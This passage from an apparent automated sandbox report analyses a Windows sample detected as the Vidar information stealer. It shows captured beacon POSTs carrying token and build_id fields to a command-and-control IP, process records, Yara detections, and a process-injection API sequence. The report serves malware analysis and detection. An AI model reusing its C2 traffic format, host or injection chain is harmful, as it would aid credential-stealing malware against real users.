                                                                                      2024-07-26 01:18:25 UTC487OUTData Raw: 48 54 67 63 63 43 69 77 58 50 54 6f 4e 64 6d 75 7a 48 71 57 67 7a 33 45 6c 78 4e 72 56 6c 59 58 46 7a 74 4b 79 58 6b 61 77 34 7a 49 4f 34 6b 59 4d 53 44 31 77 4d 38 69 73 75 2b 6c 6d 73 62 62 56 4e 45 75 4e 53 6a 6a 73 4e 54 6d 61 32 30 69 77 6c 6b 32 77 51 78 66 61 43 66 74 4c 66 77 6f 42 74 59 42 76 76 48 4a 50 54 6b 38 53 66 46 48 69 42 72 6d 61 35 62 58 64 54 4e 78 4e 48 35 55 73 70 75 35 4e 7a 70 2f 64 59 35 79 56 35 50 42 34 35 70 50 2b 45 6d 31 37 2b 7a 66 37 4e 2f 74 76 55 76 73 47 7a 79 2f 73 76 32 75 54 79 74 6e 39 33 5a 6e 47 50 62 46 46 68 33 4f 7a 2b 49 46 6c 48 61 65 44 76 44 38 46 6f 39 6d 39 6a 61 58 4e 7a 62 77 76 42 64 77 79 6d 55 59 6a 4a 63 37 47 50 4c 45 4d 54 2f 41 48 63 71 44 6a 6a 50 6d 39 53 74 63 7a 76 62 78 32 37 7a 53 4e 42 45
                                                                                      Data Ascii: HTgccCiwXPToNdmuzHqWgz3ElxNrVlYXFztKyXkaw4zIO4kYMSD1wM8isu+lmsbbVNEuNSjjsNTma20iwlk2wQxfaCftLfwoBtYBvvHJPTk8SfFHiBrma5bXdTNxNH5Uspu5Nzp/dY5yV5PB45pP+Em17+zf7N/tvUvsGzy/sv2uTytn93ZnGPbFFh3Oz+IFlHaeDvD8Fo9m9jaXNzbwvBdwymUYjJc7GPLEMT/AHcqDjjPm9Stczvbx27zSNBE
                                                                                      2024-07-26 01:18:26 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:26 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.4497595.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:27 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:27 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------GHJKECAAAFHJECAAAEBFCont
                                                                                      2024-07-26 01:18:28 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:27 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.4497605.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:28 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCB
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------EHJKJDGCGDAKFHIDBGCBCont
                                                                                      2024-07-26 01:18:29 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:29 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:21:17:49
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                      Imagebase:0x20000
                                                                                      File size:6'581'760 bytes
                                                                                      MD5 hash:4EA39E58D5185EA13C816062F97E001D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:21:17:50
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      Imagebase:0x5c0000
                                                                                      File size:262'432 bytes
                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:21:17:50
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      Imagebase:0x220000
                                                                                      File size:262'432 bytes
                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:21:17:50
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      Imagebase:0xf0000
                                                                                      File size:262'432 bytes
                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:21:17:50
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      Imagebase:0xfb0000
                                                                                      File size:262'432 bytes
                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:21:18:28
                                                                                      Start date:25/07/2024
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 2812
                                                                                      Imagebase:0x610000
                                                                                      File size:483'680 bytes
                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.5%
                                                                                        Dynamic/Decrypted Code Coverage:90%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:30
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 18685 59bf688 18686 59bf6d1 Wow64SetThreadContext 18685->18686 18688 59bf749 18686->18688 18689 59bd2c8 18690 59bd31c LoadLibraryA 18689->18690 18692 59bd3e3 18690->18692 18693 59bf9e8 18694 59bfa34 WriteProcessMemory 18693->18694 18696 59bfacd 18694->18696 18678 59bf890 18679 59bf8d4 VirtualAllocEx 18678->18679 18681 59bf94c 18679->18681 18682 59be390 18683 59be3d8 VirtualAlloc 18682->18683 18684 59be443 18683->18684 18697 59bf160 18698 59bf1a4 ResumeThread 18697->18698 18700 59bf1f0 18698->18700 18701 5463cd8 18702 5463ce4 18701->18702 18703 5463cef 18702->18703 18706 59b4650 18702->18706 18710 59b1736 18702->18710 18707 59ba968 18706->18707 18714 59bcff0 18707->18714 18711 59b1755 18710->18711 18713 59bcff0 VirtualProtect 18711->18713 18712 59b177f 18712->18712 18713->18712 18715 59bd03d VirtualProtect 18714->18715 18716 59ba985 18715->18716

                                                                                        Executed Functions

                                                                                        Function 05462582 Relevance: 65.8, Strings: 52, Instructions: 834COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 5462582-54625be 2 54625c5-5463704 0->2 3 54625c0 0->3 28 5463706 2->28 29 546370b-5463874 2->29 3->2 28->29 40 546387f-54638bd 29->40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$#$&$&2zB$'$($($)$*$+$,$0$0$2$4$4$6EB$9$;$>6A$?$@$D$F$H$I$J$K$K$L$L$M$MG8A$N$P$PBdA$Q$T$U$U$U$V$X$Z YB$\$]$_$a$a$b$tRB$'pB
                                                                                        • API String ID: 0-850010461
                                                                                        • Opcode ID: 81586153585748cc89a8bee2067e2295142b16fcbe4ff447b734911fe33e898e
                                                                                        • Instruction ID: 0c1ce2527a3e3cea82179646890903773c10dfd95f9ae14603b7e0af097d4ba4
                                                                                        • Opcode Fuzzy Hash: 81586153585748cc89a8bee2067e2295142b16fcbe4ff447b734911fe33e898e
                                                                                        • Instruction Fuzzy Hash: D3B291B1D41A298FEB64DF29DD44B9ABBF5FB48301F0181EAE40CA7354EB755A858F00
                                                                                        Function 05462590 Relevance: 65.8, Strings: 52, Instructions: 829COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 43 5462590-54625be 44 54625c5-5463704 43->44 45 54625c0 43->45 70 5463706 44->70 71 546370b-5463874 44->71 45->44 70->71 82 546387f-54638bd 71->82
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$#$&$&2zB$'$($($)$*$+$,$0$0$2$4$4$6EB$9$;$>6A$?$@$D$F$H$I$J$K$K$L$L$M$MG8A$N$P$PBdA$Q$T$U$U$U$V$X$Z YB$\$]$_$a$a$b$tRB$'pB
                                                                                        • API String ID: 0-850010461
                                                                                        • Opcode ID: 2bdc67c2c0a726d22a7e7808b067cb5295e3b4eec191f9f5106777ce47f3a8a0
                                                                                        • Instruction ID: cdbd28d060bd72da7a2e54cc3410c11eaa028e7f956e75e545085794f325a16d
                                                                                        • Opcode Fuzzy Hash: 2bdc67c2c0a726d22a7e7808b067cb5295e3b4eec191f9f5106777ce47f3a8a0
                                                                                        • Instruction Fuzzy Hash: 60B291B1D41A298FEB64DF29DD44B9ABBF5FB48301F0181EAE40CA7354EB755A858F00
                                                                                        Function 054ABF00 Relevance: 65.8, Strings: 52, Instructions: 778COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 85 54abf00-54abf20 86 54abf22 85->86 87 54abf27-54ad14b 85->87 86->87 120 54ad151 call 5462582 87->120 121 54ad151 call 5462590 87->121 119 54ad157-54ad165 120->119 121->119
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$#$&$&2zB$'$($($)$*$+$,$0$0$2$4$4$6EB$9$;$>6A$?$@$D$F$H$I$J$K$K$L$L$M$MG8A$N$P$PBdA$Q$T$U$U$U$V$X$Z YB$\$]$_$a$a$b$tRB$'pB
                                                                                        • API String ID: 0-850010461
                                                                                        • Opcode ID: d44ca31e4a88698a8a5470b3534f56ab967e60cd44b93713463bc8b7721124f5
                                                                                        • Instruction ID: 5dd0468d711e0c8a1eb0e56b02ad641c0aa3200b413417c523c588ae634399c2
                                                                                        • Opcode Fuzzy Hash: d44ca31e4a88698a8a5470b3534f56ab967e60cd44b93713463bc8b7721124f5
                                                                                        • Instruction Fuzzy Hash: BAA29FB0D056298FDB64DF29DE8479ABBF2FB48305F1181EAD40CAB354EB755A858F00
                                                                                        Function 059B1B10 Relevance: 6.7, Strings: 5, Instructions: 409COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 122 59b1b10-59b1b31 123 59b3009-59b300f 122->123 124 59b1b37-59b1b69 122->124 125 59b3015-59b3020 123->125 124->123 129 59b1b6f-59b1bd4 124->129 127 59b3022 125->127 127->127 135 59b1bda-59b1be5 129->135 136 59b49e6-59b4b5b 129->136 135->123 137 59ba004-59ba010 135->137 155 59b4b5d-59b4b75 136->155 156 59b4b77 136->156 137->125 157 59b4b7d-59b4b7f 155->157 156->157 158 59b4bad-59b4bf2 157->158 159 59b4b81-59b4b8d 157->159 165 59b4c67-59b4d01 158->165 166 59b4bf4-59b4c47 158->166 160 59b4b9f-59b4ba8 159->160 161 59b4b8f-59b4b95 159->161 160->158 161->160 179 59b4d4a-59b4d8e 165->179 180 59b4d03-59b4d48 165->180 173 59b4c59-59b4c62 166->173 174 59b4c49-59b4c4f 166->174 173->165 174->173 185 59b4d9a-59b4eb0 179->185 180->185 198 59b4f0a-59b4f13 185->198 199 59b4eb2-59b4ebd 185->199 200 59b4f3f-59b4f40 198->200 201 59b4f2d-59b4f36 199->201 203 59b4f4f-59b4f50 200->203 201->200 202 59b4f38 201->202 202->198 202->200 202->203 204 59b4f79-59b50a5 202->204 205 59b4ebf-59b4ec9 202->205 203->204 220 59b50aa-59b50d0 204->220 206 59b4ecf-59b4efa 205->206 207 59b4f52-59b4f5c 205->207 214 59b4efc-59b4f08 206->214 215 59b4f42-59b4f4d 206->215 209 59b4f5e 207->209 210 59b4f63-59b4f77 207->210 209->210 210->201 210->204 214->198 217 59b4f21-59b4f27 214->217 215->203 218 59b4f15-59b4f1b 215->218 217->201 218->217 220->137
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Te^q$Te^q$Xz^q$Xz^q$i
                                                                                        • API String ID: 0-2391991066
                                                                                        • Opcode ID: 28c684592c0b4b3a91ea6ce345469ca892ff6d86ab2e27a4cd7aa8cb4cc86b8b
                                                                                        • Instruction ID: 1bda8b28ef30c5274d89710c37a497457326fd87828ec115a1e3a2bb8eb682cd
                                                                                        • Opcode Fuzzy Hash: 28c684592c0b4b3a91ea6ce345469ca892ff6d86ab2e27a4cd7aa8cb4cc86b8b
                                                                                        • Instruction Fuzzy Hash: 3822A274E052298FEB64DF25DD84AD9BBB2FB48301F0085E9D40DA7260DB75AE91CF40
                                                                                        Function 059B3036 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 381 59b3036-59b3087 386 59b308d-59b309b 381->386 387 59b49e6-59b4b5b 381->387 388 59b3009-59b300f 386->388 389 59b30a1-59b30f1 386->389 414 59b4b5d-59b4b75 387->414 415 59b4b77 387->415 391 59b3015-59b3020 388->391 389->388 392 59b3022 391->392 392->392 416 59b4b7d-59b4b7f 414->416 415->416 417 59b4bad-59b4bf2 416->417 418 59b4b81-59b4b8d 416->418 424 59b4c67-59b4d01 417->424 425 59b4bf4-59b4c47 417->425 419 59b4b9f-59b4ba8 418->419 420 59b4b8f-59b4b95 418->420 419->417 420->419 438 59b4d4a-59b4d8e 424->438 439 59b4d03-59b4d48 424->439 432 59b4c59-59b4c62 425->432 433 59b4c49-59b4c4f 425->433 432->424 433->432 444 59b4d9a-59b4eb0 438->444 439->444 457 59b4f0a-59b4f13 444->457 458 59b4eb2-59b4ebd 444->458 459 59b4f3f-59b4f40 457->459 460 59b4f2d-59b4f36 458->460 462 59b4f4f-59b4f50 459->462 460->459 461 59b4f38 460->461 461->457 461->459 461->462 463 59b4f79-59b50a5 461->463 464 59b4ebf-59b4ec9 461->464 462->463 479 59b50aa-59ba010 463->479 465 59b4ecf-59b4efa 464->465 466 59b4f52-59b4f5c 464->466 473 59b4efc-59b4f08 465->473 474 59b4f42-59b4f4d 465->474 468 59b4f5e 466->468 469 59b4f63-59b4f77 466->469 468->469 469->460 469->463 473->457 476 59b4f21-59b4f27 473->476 474->462 477 59b4f15-59b4f1b 474->477 476->460 477->476 479->391
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: H$Te^q$Xz^q$Xz^q
                                                                                        • API String ID: 0-359572378
                                                                                        • Opcode ID: 5ab6c1cc570fe9c1d05ecda8238f08353420817226e8fee48707431bcf831f24
                                                                                        • Instruction ID: 2b29f68bd83f6457fbdc403d871cc3e8039ecd355745d599a43d10f0552d7486
                                                                                        • Opcode Fuzzy Hash: 5ab6c1cc570fe9c1d05ecda8238f08353420817226e8fee48707431bcf831f24
                                                                                        • Instruction Fuzzy Hash: 7412A078E052298FDB64DF25DD84AD9BBB2FB88301F1085E9D40DA7260DB75AE91CF40
                                                                                        Function 059B3201 Relevance: 4.1, Strings: 3, Instructions: 348COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 483 59b3201-59b3267 489 59b326d-59b326e 483->489 490 59b49e6-59b4b5b 483->490 489->490 508 59b4b5d-59b4b75 490->508 509 59b4b77 490->509 510 59b4b7d-59b4b7f 508->510 509->510 511 59b4bad-59b4bf2 510->511 512 59b4b81-59b4b8d 510->512 518 59b4c67-59b4d01 511->518 519 59b4bf4-59b4c47 511->519 513 59b4b9f-59b4ba8 512->513 514 59b4b8f-59b4b95 512->514 513->511 514->513 532 59b4d4a-59b4d8e 518->532 533 59b4d03-59b4d48 518->533 526 59b4c59-59b4c62 519->526 527 59b4c49-59b4c4f 519->527 526->518 527->526 538 59b4d9a-59b4eb0 532->538 533->538 551 59b4f0a-59b4f13 538->551 552 59b4eb2-59b4ebd 538->552 553 59b4f3f-59b4f40 551->553 554 59b4f2d-59b4f36 552->554 556 59b4f4f-59b4f50 553->556 554->553 555 59b4f38 554->555 555->551 555->553 555->556 557 59b4f79-59b50a5 555->557 558 59b4ebf-59b4ec9 555->558 556->557 573 59b50aa-59ba010 557->573 559 59b4ecf-59b4efa 558->559 560 59b4f52-59b4f5c 558->560 567 59b4efc-59b4f08 559->567 568 59b4f42-59b4f4d 559->568 562 59b4f5e 560->562 563 59b4f63-59b4f77 560->563 562->563 563->554 563->557 567->551 570 59b4f21-59b4f27 567->570 568->556 571 59b4f15-59b4f1b 568->571 570->554 571->570 578 59b3022 573->578 578->578
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Te^q$Xz^q$Xz^q
                                                                                        • API String ID: 0-2008720192
                                                                                        • Opcode ID: c40261d1f1bad0a742a798b3709954ccfab0fd79cb2941e9691ae4a70a732f2c
                                                                                        • Instruction ID: fa151dabd1fc7e43e90e6faee40a5b42757106ca6b09f470d5a3fe15d54400dd
                                                                                        • Opcode Fuzzy Hash: c40261d1f1bad0a742a798b3709954ccfab0fd79cb2941e9691ae4a70a732f2c
                                                                                        • Instruction Fuzzy Hash: B0128274E052298FDB64DF25DD84AD9BBB2FB88301F1081EAD40DA7264DB75AE91CF40
                                                                                        Function 054A2106 Relevance: 1.8, Strings: 1, Instructions: 561COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 813 54a2106-54a210a 814 54a210b-54a2120 813->814 815 54a2acd-54a2add 813->815 814->815 816 54a2121-54a212c 814->816 818 54a2132-54a213e 816->818 819 54a214a-54a2159 818->819 821 54a21b8-54a21bc 819->821 822 54a21c2-54a21cb 821->822 823 54a2264-54a22ce 821->823 824 54a21d1-54a21e7 822->824 825 54a20c6-54a20d2 822->825 823->815 861 54a22d4-54a281b 823->861 833 54a2239-54a224b 824->833 834 54a21e9-54a21ec 824->834 825->815 827 54a20d8-54a20e4 825->827 828 54a215b-54a2161 827->828 829 54a20e6-54a20fa 827->829 828->815 831 54a2167-54a217f 828->831 829->828 839 54a20fc-54a2105 829->839 831->815 842 54a2185-54a21ad 831->842 843 54a2a0c-54a2ac2 833->843 844 54a2251-54a2261 833->844 834->815 835 54a21f2-54a222f 834->835 835->823 857 54a2231-54a2237 835->857 839->813 842->821 843->815 857->833 857->834 939 54a281d-54a2827 861->939 940 54a2832-54a28c5 861->940 941 54a282d 939->941 942 54a28d0-54a2963 939->942 940->942 943 54a296e-54a2a01 941->943 942->943 943->843
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D
                                                                                        • API String ID: 0-2746444292
                                                                                        • Opcode ID: 535b674b2f89f022fee49cf9467df3352e90965503ba8c9a9f55366ff97c1e57
                                                                                        • Instruction ID: a5ed169f65bc8644c7f4e7d9b4a383fbe87c007f1f0fdd4c74af10954b23f820
                                                                                        • Opcode Fuzzy Hash: 535b674b2f89f022fee49cf9467df3352e90965503ba8c9a9f55366ff97c1e57
                                                                                        • Instruction Fuzzy Hash: 8A52C774A01228DFCB64DF68D998A9EB7B6FF88300F1045D9D509A7365CB34AE81CF91
                                                                                        Function 054A7340 Relevance: .2, Instructions: 197COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fce4d583e6964cc3a526a03b3c01f2fd746cf970c483feee97081e4b0602c436
